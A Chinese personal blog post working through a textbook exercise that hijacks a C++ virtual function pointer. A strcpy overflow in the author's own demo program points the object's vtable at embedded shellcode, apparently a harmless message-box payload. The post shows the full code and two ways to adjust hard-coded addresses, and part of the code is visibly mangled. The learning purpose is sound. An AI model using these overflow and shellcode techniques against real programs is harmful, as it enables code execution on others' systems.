读0day攻击C++函数心得
读0day攻击C++函数心得
余青木 发表于4年前
读0day攻击C++函数心得
  • 发表于 4年前
  • 阅读 724
  • 收藏 40
  • 点赞 0
  • 评论 3

【腾讯云】如何购买服务器最划算?>>>   

摘要: 0day第二版里写了一种触发方式,我经过调试,又发现了一种调试方式。这是我第一次实际调试后发现的新东西,所以写下来,以备以后的复习

废话不说,直接上代码 原版代码:

#include "windows.h" #include "iostream.h" char shellcode[]= "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95" "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59" "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A" "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75" "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03" "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB" "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50" "\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"

 "\x1C\x88\x40\x00";

//set fake virtual function pointer

class Failwest 

{

 public: char buf[200]; 

virtual void test(void)

 { 

cout<<"Class Vtable::test()"<test();

 }

Failwest overflow, *p;

void main(void)

{

char * p_vtable;

p_vtable=overflow.buf-4;//point to virtual table

//__asm int 3

//reset fake virtual table to 0x004088cc

//the address may need to ajusted via runtime debug

p_vtable[0]=0xCC;

p_vtable[1]=0x88;

p_vtable[2]=0x40;

p_vtable[3]=0x00;

strcpy(overflow.buf,shellcode);//set fake virtual function pointer

p=&overflow;

p->test();

}

这是failwest书里原版代码。其附带的exe,经实测,可以在xp,sp3下运行。

但是很奇怪的是,我把源代码一字不改的重新在上述环境里编译后,却不能正常运行,不知道为什么。

于是,想到要改写程序,以适应实际的环境。

用paintf("%x\n",overflow.buf);得到overflow.buf为0x40BAAC

于是将源代码改写为

        p_vtable[0]=0xAC - 4;

p_vtable[1]=0xBA;

p_vtable[2]=0x40;

p_vtable[3]=0x00;

程序正常运行。
原因:将虚表指针p_vtable改写为0x40BAA8,则程序执行到p->test()时,将按照伪造的虚函数指针去0x40BAA8寻找虚表,而0x40BAA8地址值也为0x40BAA8,即为无效指令,对程序执行无影响。但是EIP+4,跳到了shellcode的起始地址处,开始执行了shellcode,于是程序正常运行。(见下图)


法二:

分析原代码可知:

p_vtable[0]=0xCC;

p_vtable[1]=0x88;

p_vtable[2]=0x40;

p_vtable[3]=0x00;

执行后,
0x4088CC指向shellcode的末尾,在这里填上shellcode的起始位置0x0040881c作为伪造的虚函数入口地址,程序将最终去执行shellcode。

那么0x4088CC是怎么来的呢?

也就是shellcode首地址0x40881C + 176(0B0h) = 0x4088CC ,176为不加最后四字节"\x1C\x88\x40\x00"的shellcode的长度。

既然这样,那就好办了。

得到在我的系统里overflow.buf为0x40BAAC,那么加上0B0h,得0x40BB5C,即

p_vtable[0]=0x5c;

p_vtable[1]=0xbb;

p_vtable[2]=0x40;

p_vtable[3]=0x00;

然后将shellcode最后的入口地址改为

"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"

"\xac\xba\x40\x00";//set fake virtual function pointer

即可。


虽然原理比较简单,但这次是我第一次正儿八经的写次博客,这么少的字,但是中途还是有让我不想写的念头。但觉得既然决定了,就好好的写下去,毕竟写技术博客只有好处,没有坏处。

以后会继续写下去,争取写得更通俗易懂。


共有 人打赏支持
粉丝 2
博文 20
码字总数 6510
评论 (3)
ericsoul
呃,没看懂。可能太难了。
Micooz
虚表地址固定的?
余青木

引用来自“Micooz”的评论

虚表地址固定的?

不是的
×
余青木
如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!
* 金额(元)
¥1 ¥5 ¥10 ¥20 其他金额
打赏人
留言
* 支付类型
微信扫码支付
打赏金额:
已支付成功
打赏金额: